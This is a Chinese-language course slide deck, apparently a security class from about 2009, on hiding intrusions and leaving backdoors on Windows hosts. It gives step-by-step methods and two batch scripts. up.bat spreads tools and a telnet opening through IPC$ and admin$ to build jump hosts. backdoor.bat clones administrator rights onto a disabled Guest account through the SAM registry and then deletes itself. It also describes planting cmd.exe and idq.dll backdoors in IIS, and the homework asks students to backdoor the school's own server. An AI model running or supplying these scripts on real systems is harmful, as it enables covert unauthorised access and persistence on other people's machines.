资源描述
Click to edit Master title style,Click to edit Master text styles,Second level,Third level,Fourth level,Fifth level,11/7/2009,#,项目5攻击的隐藏技术与留后门技术,课题引入,隐藏技术,留后门,课题引入项目背景,获取帐号密码,“基于认证的入侵”即基于“用户名/密码”认证的入,侵。因此,存在获得口令的问题,入侵者一般采取以下手段来获取远程主机的管理员密码:,弱口令扫描:找到存在弱口令的主机,密码监听:通过Sniffer(嗅探器)监听,社交工程学:通过欺诈手段或人际关系获取,暴力破解:获取密码只是时间问题,其它方法:种植木马、安装键盘记录程序,课题引入项目分析,完成本项目需要解决的问题:,为了了保障安全,如何隐藏信息?,如何在计算机上留下后门?,课题引入教学目标,完成本项目需要实现的教学目标:,隐藏计算机信息来保证安全(重点掌握),在计算机上留下后门,供黑客入侵(掌握),各种入侵方法的区别及优劣(理解),课题引入应达到的职业能力,熟练掌握隐藏信息的使用方法,能够通过后门入侵,项目问题1隐藏技术,在前面介绍的入侵技术,入侵者难免与远程主,机/服务器直接接触,这样很容易暴露自己的真实,身份,因此,入侵者需要一些额外的手段来隐藏,自己的行踪。,虽然隐藏技术多种多样,甚至有一些是没有公,开的高级技术,但是对于电子设备构成的网络,,不可能找不到入侵者留下的痕迹。,项目问题1隐藏技术,我们主要了解的隐藏技术:,文件传输隐藏技术,扫描隐藏技术,入侵隐藏技术,文件传输与文件隐藏,入侵文件传输的方法,使用IPC$进行传输,其中有两种方式:copy,命令和xcopy命令(一个重要参数是/E,表示,拷贝前后文件目录结构保持一致)。,映射硬盘方式:映射硬盘方式是图形界面的,操作方式,因此不适合大体积文件的传输,,更不适合入侵者实现“多跳”传输。,FTP传输:不需要IPC$共享,但是必须建立,FTP服务器,文件的压缩,过去使用的文件压缩工具为图形界面方式的,,例如WinRar。如果仅能使用命令行传输文件时,,我们可以使用rarx300进行文件的压缩。,rarx300使用方法:,压缩命令:rar32a,解压缩命令:rar32x,文件压缩实例,第一步:在本地执行rarx300.exe,进行工具解,压,生成rar文件夹,其中rar文件夹中的rar32.exe,才是真正用来压缩的工具,第二步:进入rar文件夹中,通过压缩命令对文,件进行压缩,例如rar32ad:nc.rard:nc.exe对nc,进行压缩,第三步:讲压缩文件和压缩工具rarx300.exe上,传到被入侵的主机,第四步:在被入侵的主机上进行解压操作,Opentelnet简介,Opentelnet是用来解除telnet的NTLM验证的工具。,使用方法:opentelnetip,Opentelnet简介,参数说明:,ip:目标主机ip,:更改telnet的服务端口,:,0:不使用NTLM身份认证,1:先尝试NTLM身份验证,如果失败,再使用,用户名和密码,2:只使用NTLM身份验证,opentelnet实例分析,文件的隐藏,前面我们介绍了通过命令行修改文件属性的方,法,例如我们使用命令“attrib+h+s,c:winnttools”来实现tools文件夹添加隐藏和系,统属性。,在Windows系统中存在一些“系统专用文件,夹”,例如计划任务、控制面板、回收站等等。,实际上,这些文件夹也是可以存放文件的,而,且非常隐藏,使用系统文件夹隐藏文件实例,步骤一:将文件拷贝到计划任务文件夹下,使用系统文件夹隐藏文件实例,步骤二:在dos下查看计划任务文件夹的内容,使用系统文件夹隐藏文件实例,步骤三:在windows图形界面下查看文件夹内容,自己创建系统专用文件夹,首先创建新建一个文件夹,命名为,“fakeTasks.D6277990-4C6A-11CF-8D87-,00AA0060F5BF”,文件夹名字后面的“.”,可以看成是扩展名,当命名成功后,可以发现最终文件夹的名字是,fakeTasks,而且该文件夹与计划任务的文件夹,样子是一样的,自己创建系统专用文件夹,其它常用系统专用文件夹,控制面板:21EC2020-3AEA-1069-A2DD-,08002B30309D,管理工具:D20EA4E1-3957-11d2-A40B-,0C5020524153,打印机配置:2227A280-3AEA-1069-A2DE-,08002B30309D,扫描隐藏技术,我们可以利用“肉鸡”,使用xscan的命令行进,行扫描,利用流光Sensor制作、管理肉鸡,入侵隐藏技术跳板技术,二级跳板结构,二级跳板如何实现入侵,二级跳板制作,步骤一:准备工具,例如Opentelnet.exe、,rar300、Tool.rar(包含nc.exe、漏洞溢出工具、,远程命令执行、远程进程查杀等),二级跳板制作,步骤二:编写BAT文件up.bat,opentelnet.exe%1%2%3122,netuse%1ipc$%3/user:%2,copyrarx300.exe%1admin$rarx300.exe,copyopentelnet.exe%1admin$opentelnet.exe,copytoolscopytoolsrar.rar%1admin$toolstoolsrar.rar,copyup.bat%1admin$up.bat,netuse*/del,delrarx300.exe,delopentelnet.exe,deltools.rar,delup.bat,二级跳板制作,步骤三:把rarx300.exe、opentelnet.exe、,tools.rar和up.bat四个文件拷贝到同一个文件夹下,,然后在dos下进入该文件夹,输入up.bat,1921680106sysback123456192.168.0.106sysback123456来制作第一个跳,板,步骤四:通过telnet192.168.0.10622登录到一,级跳板,然后仿照步骤三制作二级跳板,步骤五:进入二级跳板进行对远程主机的入侵,项目问题2留后门,从入侵者来看,后门分为三种,账号后门,漏洞后门,木马后门,对于一般的账号,我们都可以通过管理工具,用户和组看到,因此需要将后门进行隐藏,项目问题2留后门,创建不容易被发现的后门,最理想的是使用克,隆方法使得“已被禁用的Guest账号”为我所用,克隆的账号是无法通过“管理工具”和“命令”,看出其真实权限和身份的,克隆账号简介,克隆帐号是通过修改注册表的SAM来实现的。SAM,(SecurityAccountManager)是专门用来管理Windows系,统中账号的数据库,里面存放了一个账号所有的属性,包,括账号的配置文件路径、账号权限、账号密码等,要修改SAM,经常需要使用工具PSU.exe,使用方式是:,psu参数选项,p,i默认su到的进程为system,克隆账号实例,步骤一:打开注册表编辑器,可以看到,SAM,一般是无法进行修改的。如果想修改,必须提,升权限,克隆账号实例,步骤二:通过进程管理器查看System进程,并,记录该进程PID,windows2000一般为8,克隆账号实例,步骤三:使用psu.exe提升权限,克隆账号实例,步骤四:查看SAM中的账号信息,其中,UsersNames下有所有账号列表,在User键下,,已十六进制数字为名的键记录着账号的权限、,密码等配置,克隆账号实例,步骤五:克隆账号,就是吧Guest账号的权限克,隆为管理员权限,克隆账号实例,步骤六:禁用Guest账号,克隆账号实例,步骤七:查看Guest账号,克隆账号实例,步骤八:使用Guest账号进行IPC$入侵,命令行方式克隆账号,使用命令行方式克隆账号需要工具:,reg.exe:命令行下的注册表编辑工具,psu.exe:权限提升工具,pslist.exe:查看远程主机进程,命令行方式克隆账号,步骤一:编写BAT文件backdoor.bat,psup“regedit/sdelf.reg”i%1,psup“regcopy,hklmSAMSAMDomainsAccountUsers000001F4f,hklmSAMSAMDomainsAccountUsers000001F5f”,i%1,netuserguest/active:yes,netuserguest123456789,netuserguest/active:no,deldelf.reg,delreg.exe,delpsu.exe,delbackdoor.bat,命令行方式克隆账号,步骤二:使用pslist.exe查看远程主机的System,进程PID,使用命令为“pslistipu用户名p,密码”,步骤三:上传backdoor.bat,执行克隆命令,步骤四:进行验证,退出,漏洞后门,制造Unicode漏洞,步骤一:找出Web根目录,步骤二:拷贝cmd.exe到IIS目录中,一般可,放在IIS的Scripts文件夹中,步骤三:使用文件隐藏方法隐藏文件,步骤四:验证Unicode后门,漏洞后门,制造.idq漏洞,步骤一:把idq.dll传入远程服务器的Scripts目,录中,步骤二:隐藏后门文件,步骤三:利用idq或ida漏洞进行入侵,验证。,总结,完成本项目的学习之后,我们已经掌握了基,于认证入侵的方法。具体内容如下:,掌握了隐藏信息的方法,掌握了在计算机上留后门的方法,作业,对学校网络进行考察,完成以下两个题目:,1.隐藏机房服务器的信息,并通过各种入侵方,式扫描查看,2.在服务器上留下后门,。,
展开阅读全文